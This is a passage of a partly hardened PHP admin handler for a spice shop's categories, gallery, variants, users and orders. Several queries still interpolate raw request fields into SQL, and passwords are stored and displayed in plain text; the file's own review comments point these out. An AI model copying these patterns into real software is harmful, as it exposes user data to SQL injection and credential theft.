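				// The category name is HTML-escaped before it is written into the table cell.
				$category = htmlspecialchars((string) $data['category'], ENT_QUOTES, 'UTF-8');
				// NOTE(review): assumes integer ids; confirm against the schema.
				$id = (int) $data['id'];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $category; ?></td>
					<td>
						<a href='#mycategory' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_category" data-toggle="modal" data-target="#mycategory" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a id="del_cat" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php
			}
		}
	}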
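	/*Add Category*/
	// Inserts one category row; prints "OK" or "Failed.".
	if ($_POST['command'] === "add_category") {
		$category = (isset($_POST['category']) && is_string($_POST['category'])) ? $_POST['category'] : '';
		// Interim quoting for the SQL string literal (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$category = "'" . addslashes($category) . "'";

		$ob->query("insert into category SET category=$category");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "Failed.";
		}
	}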
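	///////////Edit Category
	// Renders the pre-filled edit form for one category; the form posts back as do_category_edit.
	if ($_POST["command"] === "edit_category") {
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$ob->query("SELECT * FROM category WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				// Escaped so a quote in the stored name cannot end the value attribute.
				$name = htmlspecialchars((string) $data["category"], ENT_QUOTES, 'UTF-8');
			?>
				<form>
					<div class="modal-body">
						<div class="form-group">
							<label for="category">Category</label>
							<input class="form-control" type="text" id="category" name="category" value="<?php echo $name; ?>">
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success toastrDefaultSuccess" value="Update" />
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_category_edit" />
					</div>
				</form>
			<?php
			}
		}
	}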
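	////////////////////////////// Edit Category
	// Renames one category; prints "OK" or "failed".
	if ($_POST["command"] === "do_category_edit") {
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$category = (isset($_POST["category"]) && is_string($_POST["category"])) ? $_POST["category"] : '';
		// Interim quoting for the SQL string literal (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$category = "'" . addslashes($category) . "'";

		$ob->query("UPDATE category SET category=$category WHERE id='$id'");

		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}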

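	/////Delete Category
	// Deletes one category row; prints "OK" or "failed".
	if ($_POST["command"] === "del_cat") {
		// The id goes into the SQL text, so it is forced to an integer first.
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["p_id"]) ? (int) $_POST["p_id"] : 0;
		$ob->query("DELETE FROM category WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}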

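	///////// Show Gallery
	// Emits one <tr> per gallery image, newest first, with its section label.
	if ($_POST['command'] === "show_gallery") {
		// Stored values are HTML-escaped before they reach markup or attributes.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		$ob->query("SELECT * FROM gallery ORDER BY `id` DESC");

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				// NOTE(review): assumes integer ids; confirm against the schema.
				$id = (int) $data["id"];
				// In the gallery table p_id holds the section number, not a product id.
				$status = $data['p_id'];

				if ($status == 0) {
					$msg = "Special Mix Masale";
				} else if ($status == 1) {
					$msg = "Dry Fruits";
				} else if ($status == 2) {
					$msg = "Whole Spices";
				} else if ($status == 3) {
					$msg = "Ladoo & Farsan";
				} else {
					$msg = "Not Found";
				}

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $esc($data['name']); ?></td>
					<td><?php echo $esc($msg); ?></td>
					<td><a href="#" data-toggle="modal" data-target="#myModal_gal<?php echo $id; ?>"><img src='<?php echo $esc($data['image']); ?>' style='max-width:100px;max-height:100px;' /></a></td>
					<td>
						<a href='#mymygallery' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_gallery" data-toggle="modal" data-target="#mygallery" data-id='<?php echo $id; ?>' data-value='<?php echo $esc($data['name']); ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a href='#mygallery' role='button' class='btn btn-sm btn-danger' id='del_gallery' value='<?php echo $id; ?>'><i class='fa fa-times'></i> Delete</a>
					</td>
				</tr>

			<?php
			}
		}
	}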

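	//////////////// Add Gallery Img
	// Stores an uploaded gallery image and records it with its name and section.
	if ($_POST["command"] === "do_add_gallery") {
		$name = (isset($_POST["name"]) && is_string($_POST["name"])) ? $_POST["name"] : '';
		// Interim quoting for the SQL string literal (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$name = "'" . addslashes($name) . "'";
		// NOTE(review): assumes an integer section number; confirm against the schema.
		$p_id = isset($_POST["p_id"]) ? (int) $_POST["p_id"] : 0;

		// Neither the client-sent MIME type nor the client file name is trusted (the extension used
		// to be the second dot-separated part of that name): the type is read from the uploaded
		// bytes and the stored extension is derived from the detected type.
		// NOTE(review): getimagesize() only inspects the header; also disable script execution
		// for product_images/ in the web-server configuration.
		$extensions = [
			IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif',
			IMAGETYPE_BMP => 'bmp', IMAGETYPE_TIFF_II => 'tiff', IMAGETYPE_TIFF_MM => 'tiff',
		];
		$folder = "product_images/";
		$img1 = null;
		if (isset($_FILES['image']['error']) && $_FILES['image']['error'] === UPLOAD_ERR_OK
			&& is_uploaded_file($_FILES['image']['tmp_name'])) {
			$info = getimagesize($_FILES['image']['tmp_name']);
			if ($info !== false && isset($extensions[$info[2]])) {
				if (!is_dir($folder)) {
					mkdir($folder);
				}
				// Random name instead of MD5(date('r')), which repeats within a second and is guessable.
				$target = $folder . bin2hex(random_bytes(16)) . '.' . $extensions[$info[2]];
				if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
					$img1 = $target;
				}
			}
		}

		$ok = false;
		if ($img1 !== null) {
			$ob->query("insert into gallery set name=$name, p_id='$p_id', image='$img1'");
			$ok = $ob->affected_rows() >= 1;
		}
		// A rejected upload now reports failure instead of returning an empty response.
		if ($ok) {
			echo "OK";
		} else {
			echo "Failed/nTry again.";
		}
	}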

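	///////////Edit Gallery
	// Renders the pre-filled edit form for one gallery image; the form posts back as do_gallery_edit.
	if ($_POST["command"] === "edit_gallery") {
		// Stored values are escaped before being placed in attribute values.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$ob->query("SELECT * FROM gallery WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form method="POST" id="product_edit_form" enctype="multipart/form-data">
					<div class="modal-body">
						<div class="form-group">
							<label for="name">Name</label>
							<input type="text" name="name" value="<?php echo $esc($data["name"]); ?>" id="name" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="p_id">Section</label>
							<select class="form-control" name="p_id" id="p_id">
								<option value="0" <?php if ($data["p_id"] == 0) {
															echo "selected";
														} ?>>Special Mix Masale</option>
								<option value="1" <?php if ($data["p_id"] == 1) {
															echo "selected";
														} ?>>Dry Fruits</option>
								<option value="2" <?php if ($data["p_id"] == 2) {
															echo "selected";
														} ?>>Whole Spices</option>
								<option value="3" <?php if ($data["p_id"] == 3) {
															echo "selected";
														} ?>>Ladoo &amp; Farsan</option>
							</select>
						</div>
						<div class="form-group">
							<label for="image">Image</label>
							<input type="file" name="image" id="image" />
						</div>
						<div class="form-group">
							<img src="<?php echo $esc($data["image"]); ?>" style='max-width:150px;max-height:150px;'>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="reset" name="reset" class="btn btn-danger boton">
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_gallery_edit" />
					</div>
				</form>
<?php
			}
		}
	}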
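	////////////////////////////// Edit Gallery
	// Updates a gallery row; the stored image is replaced only when a valid image was uploaded.
	if ($_POST["command"] === "do_gallery_edit") {
		// NOTE(review): assumes an integer id and section number; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$p_id = isset($_POST["p_id"]) ? (int) $_POST["p_id"] : 0;
		$name1 = (isset($_POST["name"]) && is_string($_POST["name"])) ? $_POST["name"] : '';
		// Interim quoting for the SQL string literal (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$name1 = "'" . addslashes($name1) . "'";

		// Neither the client-sent MIME type nor the client file name is trusted (the extension used
		// to be the second dot-separated part of that name): the type is read from the uploaded
		// bytes and the stored extension is derived from the detected type.
		// NOTE(review): getimagesize() only inspects the header; also disable script execution
		// for product_images/ in the web-server configuration.
		$extensions = [
			IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif',
			IMAGETYPE_BMP => 'bmp', IMAGETYPE_TIFF_II => 'tiff', IMAGETYPE_TIFF_MM => 'tiff',
		];
		$folder = "product_images/";
		$img = null;
		if (isset($_FILES['image']['error']) && $_FILES['image']['error'] === UPLOAD_ERR_OK
			&& is_uploaded_file($_FILES['image']['tmp_name'])) {
			$info = getimagesize($_FILES['image']['tmp_name']);
			if ($info !== false && isset($extensions[$info[2]])) {
				if (!is_dir($folder)) {
					mkdir($folder);
				}
				// Random name instead of MD5(date('r')), which repeats within a second and is guessable.
				$target = $folder . bin2hex(random_bytes(16)) . '.' . $extensions[$info[2]];
				if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
					$img = $target;
				}
			}
		}

		if ($img !== null) {
			// $img is built from the fixed folder, random hex and an allow-listed extension.
			$ob->query("UPDATE gallery SET p_id='$p_id', name=$name1, image='$img' WHERE id='$id'");
		} else {
			$ob->query("UPDATE gallery SET p_id='$p_id', name=$name1 WHERE id='$id'");
		}
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}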

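	/////Delete Gallery Image
	// Deletes one gallery row; prints "OK" or "failed". The image file itself is left on disk.
	if ($_POST["command"] === "del_gallery") {
		// The id goes into the SQL text, so it is forced to an integer first.
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["p_id"]) ? (int) $_POST["p_id"] : 0;
		$ob->query("DELETE FROM gallery WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}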


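	///////// Show Video
	// Emits one <tr> per stored video, newest first, with an embedded player and a Delete control.
	if ($_POST['command'] === "show_video") {
		$ob->query("SELECT * FROM video ORDER BY `id` DESC");

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				// NOTE(review): assumes integer ids; confirm against the schema.
				$id = (int) $data['id'];
				// Escaped so the stored value cannot close the src attribute and add markup.
				$video = htmlspecialchars((string) $data['video'], ENT_QUOTES, 'UTF-8');

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><iframe width="auto" height="200" src="https://www.youtube.com/embed/<?php echo $video; ?>" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></td>
					<td>
						<a id="del_video" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
	<?php
			}
		}
	}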
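	/*Add Video*/
	// Inserts one video row; prints "OK" or "Failed.".
	if ($_POST['command'] === "do_add_video") {
		$video = (isset($_POST['video']) && is_string($_POST['video'])) ? $_POST['video'] : '';
		// Interim quoting for the SQL string literal (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$video = "'" . addslashes($video) . "'";

		$ob->query("insert into video SET video=$video");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "Failed.";
		}
	}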
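	/////Delete Video
	// Deletes one video row; prints "OK" or "failed".
	if ($_POST["command"] === "del_video") {
		// The id goes into the SQL text, so it is forced to an integer first.
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$ob->query("DELETE FROM video WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}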
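	///////// Show Variant Color
	// Emits one <tr> per colour variant with the parent product's title.
	if ($_POST['command'] === "show_color") {
		// Stored values are HTML-escaped before they reach markup or attributes.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		$ob->query("SELECT * FROM v_color");

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				// Cast before reuse: p_id is interpolated into the product lookup below.
				// NOTE(review): assumes integer ids; confirm against the schema.
				$id = (int) $data["id"];
				$p_id = (int) $data['p_id'];

				?>
					<tr>
						<td><?php echo $i; ?></td>
						<td>
							<?php
								$ob->query("SELECT * FROM product WHERE id='$p_id'");
								if ($ob->affected_rows() >= 1) {
									foreach ($ob->rows() as $cat) {
										echo $esc($cat['title']);
									}
								} else {
									echo "No category";
								}
							?>
						</td>
						<td><?php echo $esc($data['color']); ?></td>
						<td><?php echo $esc($data['price']); ?></td>
						<td>
							<img src='<?php echo $esc($data['image']); ?>' style='max-width:100px;max-height:60px;' />
						</td>
						<td>
							<a href="#myuser" id="del_color" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
						</td>
					</tr>


				<?php
			}
		}
	}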
	
	////////////////////////////// Add Variant Color
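	if ($_POST['command'] === "do_add_color") {
		// Adds a colour variant (a `v_color` row) for a product, together with its uploaded
		// image. Answers "OK" on success and "Failed/nTry again." otherwise.
		//
		// Upload handling: the browser-supplied $_FILES type and the client file name are not
		// trusted. The image type is detected from the file content and the stored extension
		// comes from a fixed map, so a file that is not an image can no longer be saved under
		// an arbitrary extension inside the web-served product_images/ folder.
		// NOTE(review): product_images/ should also be configured so the web server never
		// executes scripts from it.
		$color = isset($_POST['color']) ? $_POST['color'] : '';
		$price = isset($_POST['price']) ? $_POST['price'] : '';
		// NOTE(review): assumes p_id is an integer product key — confirm against the schema.
		$p_id = isset($_POST['p_id']) ? filter_var($_POST['p_id'], FILTER_VALIDATE_INT) : false;

		$folder = "product_images/";
		// Same formats the original MIME allow-list accepted, keyed by detected image type.
		$extensions = array(
			IMAGETYPE_JPEG => 'jpg',
			IMAGETYPE_PNG => 'png',
			IMAGETYPE_GIF => 'gif',
			IMAGETYPE_BMP => 'bmp',
			IMAGETYPE_TIFF_II => 'tiff',
			IMAGETYPE_TIFF_MM => 'tiff',
		);

		$tmp = '';
		if (isset($_FILES['image']['tmp_name'], $_FILES['image']['error'])
			&& is_string($_FILES['image']['tmp_name'])
			&& $_FILES['image']['error'] === UPLOAD_ERR_OK
			&& is_uploaded_file($_FILES['image']['tmp_name'])) {
			$tmp = $_FILES['image']['tmp_name'];
		}
		$info = ($tmp !== '') ? getimagesize($tmp) : false;

		$saved = false;
		if ($p_id !== false && is_string($color) && is_string($price)
			&& is_array($info) && isset($extensions[$info[2]])) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			// Random name: a timestamp hash repeats for two uploads within the same second.
			$img1 = $folder . bin2hex(random_bytes(16)) . '.' . $extensions[$info[2]];
			if (move_uploaded_file($tmp, $img1)) {
				// NOTE(review): $color and $price are still interpolated into the SQL text.
				// The `database` wrapper's API is not visible here; bind them as parameters.
				$ob->query("insert into v_color SET color='$color', p_id='$p_id', price='$price', image='$img1'");
				$saved = $ob->affected_rows() >= 1;
				if ($saved) {
					compress($img1, $img1, 2000, 2000, false);
				}
			}
		}
		// Report the result of this request's insert only, never a stale row count.
		if ($saved) {
			echo "OK";
		} else {
			echo "Failed/nTry again.";
		}
	}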
	/////Delete Variant Color
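	if ($_POST["command"] === "del_color") {
		// Removes a colour variant: deletes the image file named in the row, then the row
		// itself. Answers "OK" or "failed".
		// The id is request input and is validated as an integer before it reaches either query.
		// NOTE(review): assumes v_color.id is an integer key — confirm against the schema.
		$id = isset($_POST["pro_id"]) ? filter_var($_POST["pro_id"], FILTER_VALIDATE_INT) : false;
		if ($id === false) {
			echo "failed";
		} else {
			$ob->query("SELECT * FROM v_color WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				foreach ($ob->rows() as $data) {
					$image = $data['image'];
					// Only remove an existing regular file, so a missing image does not
					// print a warning into the response.
					// NOTE(review): the path comes from the database; consider confining
					// deletion to the upload folder (presumably product_images/).
					if (is_string($image) && is_file($image)) {
						unlink($image);
					}
				}
			}
			$ob->query("DELETE FROM v_color WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "failed";
			}
		}
	}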
	///////// Show Variant Size
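	if ($_POST['command'] === "show_size") {
		// Renders one <tr> per row of `size`, with the owning product's title looked up per
		// row. Stored values are HTML-escaped before output, and the product id read back
		// from the row is cast to int before it is reused in the lookup query, because the
		// do_add_size handler writes these columns from request data.
		// NOTE(review): the int cast assumes product.id is an integer key — confirm.
		$escHtml = function ($value) {
			return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
		};
		$ob->query("SELECT * FROM size");

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $escHtml($data["id"]);
				$productId = (int) $data['p_id'];
				$size = $escHtml($data['size']);
				$price = $escHtml($data['price']);

				?>
					<tr>
						<td><?php echo $i; ?></td>
						<td>
							<?php
								$ob->query("SELECT * FROM product WHERE id='$productId'");
								if ($ob->affected_rows() >= 1) {
									foreach ($ob->rows() as $cat) {
										echo $escHtml($cat['title']);
									}
								} else {
									echo "No product";
								}
							?>
						</td>
						<td><?php echo $size; ?></td>
						<td><?php echo $price; ?></td>
						<td>
							<a href="#myuser" id="del_size" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
						</td>
					</tr>


				<?php
			}
		}
	}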
	
	////////////////////////////// Add Size
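	if ($_POST['command'] === "do_add_size") {
		// Adds a size variant (a `size` row) for a product. Answers "OK" or "Failed.".
		// The product id is validated as an integer; a request without a usable id or with
		// non-string fields is refused before any SQL is built.
		// NOTE(review): assumes p_id is an integer product key — confirm against the schema.
		$size = isset($_POST['size']) ? $_POST['size'] : '';
		$price = isset($_POST['price']) ? $_POST['price'] : '';
		$p_id = isset($_POST['p_id']) ? filter_var($_POST['p_id'], FILTER_VALIDATE_INT) : false;

		if ($p_id === false || !is_string($size) || !is_string($price)) {
			echo "Failed.";
		} else {
			// NOTE(review): $size and $price are still interpolated into the SQL text. The
			// `database` wrapper's API is not visible here; bind them as parameters.
			$ob->query("insert into size SET size='$size', p_id='$p_id', price='$price'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed.";
			}
		}
	}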
	/////Delete Size
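	if ($_POST["command"] === "del_size") {
		// Deletes one `size` row by primary key and answers "OK" or "failed".
		// The id is request input and is validated as an integer before it reaches the SQL text.
		// NOTE(review): assumes size.id is an integer key — confirm against the schema.
		$id = isset($_POST["id"]) ? filter_var($_POST["id"], FILTER_VALIDATE_INT) : false;
		if ($id === false) {
			echo "failed";
		} else {
			$ob->query("DELETE FROM size WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "failed";
			}
		}
	}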
	
	////SHOW User
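	if ($_POST['command'] === "show_user") {
		// Renders one <tr> per row of `user_detail` for the admin user list.
		// Every column is HTML-escaped before output: name, email, address and the other
		// fields are written from request data by the do_userregist and do_useredit handlers.
		// NOTE(review): the `password` column is printed as stored, which means passwords
		// are kept in a recoverable form and shown to anyone who can load this list. They
		// should be stored with password_hash() and never rendered; that needs a matching
		// change in the login and edit code, which is not visible here.
		$escHtml = function ($value) {
			return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
		};
		$ob->query("SELECT * FROM user_detail");
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$name = $escHtml($data['name']);
				$email = $escHtml($data['email']);
				$mobile = $escHtml($data['mobile']);
				$password = $escHtml($data['password']);
				$address = $escHtml($data['address']);
				$pincode = $escHtml($data['pincode']);
				$user_id = $escHtml($data["id"]);
				$msg = ($data['status'] == 1) ? "Active" : "Inactive";
				echo "
					<tr>
						<td>$i</td>
						<td>$name</td>
						<td>$email</td>
						<td>$mobile</td>
						<td>$password</td>
						<td>$address</td>
						<td>$pincode</td>
						<td>$msg</td>
						<td>
							<a href='#myuser' role='button' class='btn btn-info btn-sm btn-icon icon-left info_button edit_user' data-toggle='modal' data-id='$user_id' data-value='$name'><i class='fa fa-edit'></i> Edit</a>
							<a href='#myuser' role='button' class='btn btn-danger btn-sm btn-icon icon-left danger_button ml-1' id='del_user' value='$user_id'><i class='fa fa-times'></i> Delete</a>
							
						</td>
					</tr>
				";
			}
		}
	}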
	////////////////////////////////////////User regist
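	if ($_POST['command'] === "do_userregist") {
		// Registers a user in `user_detail` with status 1 (shown as "Active" by show_user).
		// Answers "OK", "Failed." or "Email or Mobile Already Exist.".
		//
		// Duplicate check: the original required email AND mobile to match the same row, so
		// a repeated email with a new mobile (or the reverse) passed even though the message
		// says "Email or Mobile". The check now matches on either field; empty fields are
		// left out so they do not collide with other rows that have an empty value.
		$fields = array();
		foreach (array('name', 'email', 'password', 'mobile', 'address', 'pincode') as $key) {
			$fields[$key] = (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
		}
		$name = $fields['name'];
		$email = $fields['email'];
		$password = $fields['password'];
		$mobile = $fields['mobile'];
		$address = $fields['address'];
		$pincode = $fields['pincode'];
		$status = 1;

		// NOTE(review): every value below is still interpolated into the SQL text. The
		// `database` wrapper's API is not visible here; bind them as parameters.
		// NOTE(review): the password is stored exactly as submitted. It should go through
		// password_hash(), together with a matching password_verify() in the login code.
		$duplicate = array();
		if ($email !== '') {
			$duplicate[] = "email='$email'";
		}
		if ($mobile !== '') {
			$duplicate[] = "mobile='$mobile'";
		}

		$exists = false;
		if (count($duplicate) > 0) {
			$ob->query("SELECT * FROM user_detail WHERE " . implode(' OR ', $duplicate));
			$exists = $ob->affected_rows() >= 1;
		}

		if ($exists) {
			echo "Email or Mobile Already Exist.";
		} else {
			$ob->query("insert into user_detail SET name='$name', password='$password', email='$email', mobile='$mobile',  address='$address', pincode='$pincode', status='$status'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed.";
			}
		}
	}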
	
	/////Delete user
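	if ($_POST["command"] === "del_user") {
		// Deletes one `user_detail` row by primary key and answers "OK" or "failed".
		// The id is request input and is validated as an integer before it reaches the SQL text.
		// NOTE(review): assumes user_detail.id is an integer key — confirm against the schema.
		// NOTE(review): no session or role check is visible in this handler — confirm the
		// caller is authenticated before this point is reached.
		$id = isset($_POST["id"]) ? filter_var($_POST["id"], FILTER_VALIDATE_INT) : false;
		if ($id === false) {
			echo "failed";
		} else {
			$ob->query("DELETE FROM user_detail WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "failed";
			}
		}
	}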

	///////////User Edit
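	if ($_POST["command"] === "edit_user") {
		// Renders the pre-filled edit form for one `user_detail` row; prints nothing when the
		// id is invalid or no row matches.
		// The id is validated as an integer before it reaches the SQL text, and every stored
		// value is HTML-escaped before it is placed in an attribute or the textarea.
		// NOTE(review): assumes user_detail.id is an integer key — confirm against the schema.
		// NOTE(review): the stored password is sent back to the browser in the form. With
		// hashed storage this field would start empty and only be written when filled in;
		// that needs a matching change in do_useredit.
		$escHtml = function ($value) {
			return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
		};
		$id = isset($_POST["id"]) ? filter_var($_POST["id"], FILTER_VALIDATE_INT) : false;
		if ($id !== false) {
			$ob->query("SELECT * FROM user_detail WHERE id='$id'");
		}
		if ($id !== false && $ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				?>
				<form id="user_edit_form" method="POST" enctype="multipart/form-data">
					<div class="modal-body">
						<div class="form-group">
							<label for="name">Name</label>
							<input type="text" name="name" value="<?php echo $escHtml($data["name"]); ?>" id="name" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="email">Email</label>
							<input type="email" name="email" value="<?php echo $escHtml($data["email"]); ?>" id="email" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="mobile">Mobile</label>
							<input type="text" name="mobile" value="<?php echo $escHtml($data["mobile"]); ?>" id="mobile" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="password">Password</label>
							<input type="password" name="password" value="<?php echo $escHtml($data["password"]); ?>" id="Password" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="address">Address</label>
							<textarea rows="3" name="address" id="address" class="form-control txt"><?php echo $escHtml($data["address"]); ?></textarea>
						</div>
						<div class="form-group">
							<label for="pincode">Pincode</label>
							<input type="text" name="pincode" value="<?php echo $escHtml($data["pincode"]); ?>" id="pincode" class="form-control txt">
						</div>
						<div class="form-group">
							<select class="form-control" name="status" id="status">
								<option value="1" <?php if($data["status"] == 1){echo "selected";} ?>>Active</option>
								<option value="0" <?php if($data["status"] == 0){echo "selected";} ?>>Inactive</option>
							</select>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_useredit" />
					</div>
				</form>
				<?php
			}
		}
	}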
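	if ($_POST["command"] === "do_useredit") {
		// Applies the user edit form to one `user_detail` row. Answers "OK" or "failed".
		// The id must be an integer and the status must be one of the two values the edit
		// form offers ("1" Active, "0" Inactive); anything else is refused before SQL is built.
		// NOTE(review): assumes user_detail.id is an integer key — confirm against the schema.
		$fields = array();
		foreach (array('name', 'email', 'mobile', 'password', 'address', 'pincode') as $key) {
			$fields[$key] = (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
		}
		$name = $fields['name'];
		$email = $fields['email'];
		$mobile = $fields['mobile'];
		$password = $fields['password'];
		$address = $fields['address'];
		$pincode = $fields['pincode'];
		$status = isset($_POST["status"]) ? $_POST["status"] : null;
		$id = isset($_POST["id"]) ? filter_var($_POST["id"], FILTER_VALIDATE_INT) : false;

		if ($id === false || !in_array($status, array('0', '1'), true)) {
			echo "failed";
		} else {
			// NOTE(review): the text fields are still interpolated into the SQL text. The
			// `database` wrapper's API is not visible here; bind them as parameters.
			// NOTE(review): the password is written exactly as submitted; see password_hash().
			$ob->query("UPDATE user_detail SET name='$name', password='$password', email='$email', mobile='$mobile', address='$address', pincode='$pincode', status='$status' WHERE id='$id'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "failed";
			}
		}
	}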

	///////////// SHOW ORDERS
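	if ($_POST['command'] === "show_order") {
		// Renders one <tr> per row of `orders`, newest id first, with the customer's name and
		// mobile and the product title looked up per row.
		// Stored values are HTML-escaped before output, and the user and product ids read
		// back from the row are cast to int before they are reused in the lookup queries.
		// NOTE(review): the int casts assume integer keys on user_detail.id and product.id.
		$escHtml = function ($value) {
			return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
		};
		$ob->query("SELECT * FROM orders ORDER BY `id` DESC");
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $escHtml($data["id"]);
				$user_id = (int) $data['user_id'];
				$product_id = (int) $data['product_id'];
				$quantity = $escHtml($data['quantity']);
				$order_date = $escHtml($data['order_date']);
				$payment_method = $escHtml($data['payment_method']);
				$amount = $escHtml($data['amount']);

				// Status code to label; any code outside 0-3 is shown as "Returning".
				$status = $data["status"];
				if ($status == 0) {
					$msg = "Order Received";
				} else if ($status == 1) {
					$msg = "Processing";
				} else if ($status == 2) {
					$msg = "In Shipping";
				} else if ($status == 3) {
					$msg = "Delivered";
				} else {
					$msg = "Returning";
				}
			?>

				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM user_detail WHERE id='$user_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $escHtml($cat['name']) . "<br >";
								echo $escHtml($cat['mobile']);
							}
						} else {
							echo "No name";
						}
						?>
					</td>
					<td>
						<?php
						$ob->query("SELECT * FROM product WHERE id='$product_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $escHtml($cat['title']);
							}
						} else {
							echo "No title";
						}
						?>
					</td>
					<td>
						<div><?php echo $quantity; ?></div>
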